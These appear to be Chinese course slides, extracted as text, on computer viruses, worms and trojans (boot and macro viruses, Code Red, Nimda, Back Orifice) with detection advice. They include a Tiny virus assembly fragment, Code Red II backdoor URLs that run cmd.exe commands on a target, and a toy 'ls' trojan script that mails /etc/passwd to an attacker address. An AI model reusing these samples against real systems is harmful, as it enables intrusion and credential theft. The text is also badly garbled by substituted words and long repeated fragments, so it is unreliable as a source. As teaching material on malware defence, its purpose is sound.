计算机病毒、蠕虫和特洛伊木马介绍网络安全基础课讲义

1、计算机病毒、蠕虫和特洛伊木马提纲计算机病毒网络蠕虫特洛伊木马.计算机病毒病毒构造模型病毒的分类引导型病毒文件型病毒宏病毒病毒举例病毒防备.计算机病毒的构造传染条件判别传染代码表现及破坏条件判别破坏代码传染模块表现模块.计算机病毒的分类按攻击平台分类：DOS,Win32，MAC，Unix按危害分类：良性、恶性按代码方式：源码、中间代码、目的码按宿主分类：引导型主引导区操作系统引导区文件型操作系统运用程序宏病毒.引导型病毒引导记录主引导记录MBR55AA主引导程序(446字节)分区1(16 字节)主分区表(64字节分区2(16 字节)分区3(16 字节)分区4(16 字节)终了标志2字节引导代码及

2、出错信息A.引导型病毒系统引导过程Power OnCPU & ROM BIOS InitializesPOST TestsLook for boot deviceMBR bootPartition Table LoadDOS Boot Sector RunsLoads IO.SYSMSDOS.SYSDOS Loaded.引导型病毒感染与执行过程系统引导区引导正常执行病毒病毒执行病毒驻留带毒执行。病毒引导系统病毒体。.病毒的激活过程空闲区。内存空间病毒进入int8int21int2Fint4A时钟中断处置DOS中断处置外设处置中断实时时种警报中断空闲区带病毒程序空闲区空闲区正常程序病 毒int8

3、8int8空闲区正常程序正常程序。正常程序正常程序int8是26日？ 是,破坏！int8.举例小球病毒Bouncing Ball)在磁盘上的存储位置文件分配表病毒的第二部分000号扇区001号扇区第一个空簇FF7正常的引导扇区正常的引导扇区病毒的第一部分.感染后的系统启动过程启动将病毒程序的第一部分送入内存高端将第二部分装入内存，与第一部分拼接在一同读入真正的Boot 区代码，送到0000:TC00处修正INT 13 中断向量，指向病毒转移到 0000:TC00处，开场真正的系统引导.触

4、发条件修正后的INT 13进入INT 13中断能否为读盘？执行正常的INT 13程序执行正常的INT 13程序N所读盘能否是本身？Y修正INT8 开场发作Y能否整点或半点Y执行正常的INT 13程序Y能否带病毒？N调用传染过程感染磁盘N不发作执行正常的INT 13程序N.病毒检测原理特征匹配例如，在香港病毒:1F 58 EA 1A AF 00 F0 9C: POP AXJMP F000AF1APUSHF行为监控对中断向量表的修正对引导记录的修正对.exe, 文件的写操作驻留内存软件模拟.防备与检测数据备份不要用挪动介质启动设置CMOS选项设置CMOS的引导记录维护选项安装补丁，并及时更新安装防

5、病毒软件，及时更新病毒定义码限制文件共享不随便翻开电子邮件的附件没有病毒处置前不要运用其他挪动介质不要运转不可信的程序挪动介质写维护.文件型病毒文件构造文件.EXE 文件PSP Header (256 bytes)Code, Data, StackSegment(s)(64K Bytes)代码、数据、堆栈在通一段中在内存中的是磁盘文件的镜像 PSP Header (512 bytes)Code Segment(s)(64K )Data Segment(s)(64K )Stack Segment(s)(64K ).其他可执行的文件类型.BAT.PIF.SYS.DRV.OVR.OVL.DLL.Vx

6、D.正常程序正常程序程序头正常程序程序头正常程序程序头正常程序程序头正常程序程序头正常程序程序头正常程序程序头正常程序程序头正常程序程序头正常程序程序头正常程序程序头正常程序程序头正常程序程序头正常程序程序头正常程序程序头正常程序程序头正常程序程序头正常程序程序头正常程序程序头正常程序程序头正常程序程序头正常程序程序头程序头程序头程序头程序头程序头程序头程序头程序头程序头程序头程序头程序头程序头程序头程序头程序头病毒程序头程序头病毒程序头程序头病毒程序头程序头病毒程序头程序头病毒程序头程序头病毒程序头程序头病毒程序头程序头病毒程序头程序头病毒程序头程序头病毒程序头程序头病毒程序头程序头病毒程序

7、头程序头病毒程序程序头病毒程序程序头病毒程序程序头病毒程序程序头病毒程序程序头病毒程序病毒程序病毒程序病毒程序正常程序程序头程序头文件型病毒感染机理.文件型病毒举例最简单的病毒Tiny-32(32 bytes)寻觅宿主文件翻开文件把本人写入文件封锁文件MOV AH, 4E ;setup to find a fileINT 21;find the host fileMOV AX, 3D02;setup to open the host fileINT 21;open host fileMOV AH, 40;setup to write file to diskINT 21;write to fi

8、leDB *;what files to look for.宏病毒Macro Virus历史：1980年，Dr. Fredrick Cohen and Ralf Burger 论文1994年，Microsoft Word 第一例宏病毒Word, Excel, Access, , Project, Lotus AmiPro, Visio, Lotus 1-2-3, AutoCAD, Corel Draw.运用数据文件进展传播，使得反病毒软件不再只关注可执行文件和引导区DOE ViRT 统计，85%的病毒感染归因于宏病毒易于编写，只需求一两天的时间，1015行代码大量的用户：90 Million

9、MS Office Users人们通常不交换程序，而交换数据.宏病毒任务机理有毒文件.docNormal.dot激活autoopen宏写入无毒文件.docNormal.dot启动激活病毒.本卷须知Macro 可以存在模板里，也可以存在文档里RTF文件也可以包含宏病毒经过IE 阅读器可以直接翻开，而不提示下载.提纲计算机病毒网络蠕虫特洛伊木马.蠕虫Worm一个独立的计算机程序，不需求宿主自我复制，自主传播Mobile占用系统或网络资源、破坏其他程序不伪装成其他程序，靠自主传播利用系统破绽；利用电子邮件无需用户参与.莫里斯蠕虫事件发生于1988年，当时导致大约6000台机器瘫痪主要的攻击方法Rsh

10、，rexec：用户的缺省认证Sendmail 的debug方式Fingerd的缓冲区溢出口令猜测.CR I主要影响Windows NT系统和Windows 2000主要影响国外网络据CERT统计，至8月初曾经感染超越25万台主要行为利用IIS 的Index效力的缓冲区溢出缺陷进入系统检查c:notworm文件能否存在以判别能否感染中文维护是中文windows就不修正主页攻击白宫！.CR IIInspired by RC I影响涉及全球国内影响尤其广泛主要行为所利用缺陷一样只感染windows2000系统，由于一些参数的问题，只会导致NT死机休眠与扫描：中文windows，600个线程.Nimd

11、a 简介影响系统：MS win9x, wind2k, win XP传播途径：、文件共享、页面阅读、MS IIS目录遍历、Code Red 后门影响群发电子邮件，付病毒扫描共享文件夹，扫描有破绽的IIS, 扫描有Code Red后门的IIS Server.红色代码病毒红色代码病毒是一种结合了病毒、木马、DDOS机制的蠕虫。2001年7月中旬，在美国等地大规模蔓延。2001年8月初，出现变种coderedII，针对中文版windows系统，国内大规模蔓延。经过80端口传播。只存在与网络效力器的内存，不经过文件载体。利用IIS缓冲区溢出破绽2001年6月18日发布.CodeRed I在侵入一台效力器

12、后，其运转步骤是：设置运转环境，修正堆栈指针，设置堆栈大小为218h字节。接着运用RVA相对虚拟地址查找GetProcAddress的函数地址，然后就获得其他socket、connect、send、recv、closesocket等函数地址；假设C:notworm在，不再进一步传染；传染其他主机。发明100个线程，其中99个用户感染其他WEB效力器，被攻击IP经过一个算法计算得出；篡改主页，假设系统默许言语为“美国英语，第100个进程就将这台效力的主页改成“Welcome to worm !, Hacked By Chinese!，并继续10个小时。这个修正直接在内存中修正，而不是修正*.ht

13、m文件；假设时间在20：00UTC和23：59UTC之间，将反复和白宫主页建立衔接，并发送98k字节数据，构成DDOS攻击。.CodeRed II添加了特洛依木马的功能，并针对中国网站做了改良计算IP的方法进展了修正，使病毒传染的更快；检查能否存在CodeRedII原子，假设存在那么进入睡眠形状防止反复感染，假设不存在那么创建CodeRedII原子；创建300个线程进展传染，假设系统默许言语为简体中文或繁体中文，那么创建600个线程；检查时间。病毒作者的意图是传播过程在2001年10月1日完成，之后，蠕虫会迸发而使系统不断重新启动。在系统中安装一个特洛依木马：拷贝系统目录cmd.exe到IIS

14、的脚本执行目录下，改名为root.exe；将病毒体内的木马解紧缩写到C盘和D盘的explorer.exe木马每次系统和启动都会运转，制止系统的文件维护功能，并将C盘和D盘经过web效力器共享.CodeRed II攻击方式x.x.x.x/c/inetpub/scripts/root.exe?/c+dirx.x.x.x/c/winnt/system32/cmd.exe?/c+dir 其中x.x.x.x是被攻击的IP地址，dir可以是恣意命令，比如删除系统中的文件，向外发送数据等，这个后门后来也成为了nimda病毒的一个传播方式。 下面是cert/cc上提供的被攻击效力器日志(CA-2001-11)

15、 2001-05-06 12:20:19 0 - 0 80 GET /scripts/././winnt/system32/cmd.exe /c+dir 200 2001-05-06 12:20:19 0 - 0 80 GET /scripts/././winnt/system32/cmd.exe /c+dir+. 200 .红色代码病毒的检测和防备针对安装IIS的windows系统；能否出现负载显著添加CPU/网络的景象；用netstat an检查能否有许多对外的80端口衔接在web日志中检查能否有/default.ida?xxx.%u0078%u0000 u00=a /1.0这样的攻击记录

16、；查找系统中能否存在文件c:explorer.exe或d:explorer.exe以及root.exe；检查注册表文件中能否添加了C和D虚拟目录，以及文件维护功能能否被制止。在义务管理器中检查能否存在两个explorer.exe进程。.提纲计算机病毒网络蠕虫特洛伊木马.特洛伊木马名字来源：古希腊故事经过伪装成其他程序、有意隐藏本人恶意行为的程序，通常留下一个远程控制的后门没有自我复制的功能非自主传播用户自动发送给其他人放到网站上由用户下载.最简单的木马举例ls#!/bin/sh/bin/mail myaddresstest /etc/passwdlsPATH=./ :/usr/local/sb

17、in:/usr/local/bin:/sbin:/bin:/usr/sbin.特洛依木马举例Back OrificeCult of the Dead Cow在1998年8月发布, 公开源码软件，遵守GPL，是功能强大的远程控制器木马。boserver.exe、boconfig.exe、bogui.exe在BO效力器上启动、停顿基于文本的运用程序目录和文件操作。包括创建、删除、查看目录、查找、解压、紧缩。共享。创建共享资源HTTP效力。启动或停顿HTTP效力。击键记录。将BO效力器上用户的击键记录在一个文本文件中，同时记录执行输入的窗口名。可以获得用户口令.特洛依木马视频输入、播放。捕捉效力器屏

18、幕到一个位图文件中。网络衔接。列出和断开BO效力器上接入和接出的衔接，可以发起新衔接。查看信息。查看一切网络端口、域名、效力器和可见的共享“出口。前往系统信息，包括机器名、当前用户、CPU类型、内存容量及可用内存、Windows版本、驱动器类型、硬盘容量及运用空间。端口重定向。注册表锁住或重启计算机。传输文件.特洛依木马运用netstat a 检查能否还有未知端口监听(默许31337)检测和删除注册表HLMsoftwaremicrosoftwindowscurrentVersionrunservices键值，能否有“Name Data.exe，假设有那么删除C:windowssystem目录：删除“ .exe文件和windll.dll文件.特洛依木马其他木马国外subsever、dagger 、ACKcmdC、DeepThroat、SatansB